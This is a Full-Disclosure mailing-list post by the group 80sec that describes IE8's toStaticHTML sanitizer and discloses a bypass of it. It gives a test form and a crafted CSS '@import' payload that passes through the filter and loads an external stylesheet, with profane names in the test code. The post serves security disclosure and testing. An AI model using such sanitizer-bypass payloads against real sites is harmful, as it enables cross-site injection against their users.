IE8 toStaticHtml Bypass

[Web Sec <root () 80sec com>]

IE8 toStaticHtml Bypass

Safer Mashups: HTML Sanitization
IE8 exposes a new method on the window object named toStaticHTML. When a
string of HTML is passed to this function, any potentially executable script
constructs are removed before the string is returned. Internally, this
function is based on the same technologies as the server-side Microsoft
Anti-Cross Site Scripting Library mentioned previously.

So, for example, you can use toStaticHTML to help ensure that HTML received
from a postMessage call cannot execute script, but can take advantage of
basic formatting:

document.attachEvent('onmessage',function(e) {
if (e.domain == 'weather.example.com') {
spnWeather.innerHTML = window.toStaticHTML(e.data);
}
}

Calling:

window.toStaticHTML("This is some <b>HTML</b> with embedded script
following... <script>alert('bang!');</script>!");

will return:

This is some <b>HTML</b> with embedded script following... !

----------------------------

That is some info about toStaticHtml function from
http://blogs.msdn.com/b/ie/archive/2008/07/02/ie8-security-part-v-comprehensive-protection.aspx，80sec
found there is someway to bypass this function，it may be XEESD :)

You can test with somecode below:

<script type="text/javascript">
function fuckie()
{
var szInput = document.shit.input.value;
var szStaticHTML = toStaticHTML(szInput);

ResultComment = szStaticHTML;
document.shit.output.value = ResultComment;
}
</script>

<form name="shit">
<textarea name='input' cols=40 rows=20>
</textarea>
<textarea name='output' cols=40 rows=20>
</textarea>

<input type=button value="fuck_me" name="fuck" onclick=fuckie();>
</form>


<style>

}@import <%7D@import> url('//127.0.0.1/1.css');aaa

{;}

</style>

<div id="x">Fuck Ie</div>

http://www.wooyun.org/bug.php?action=view&id=189

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/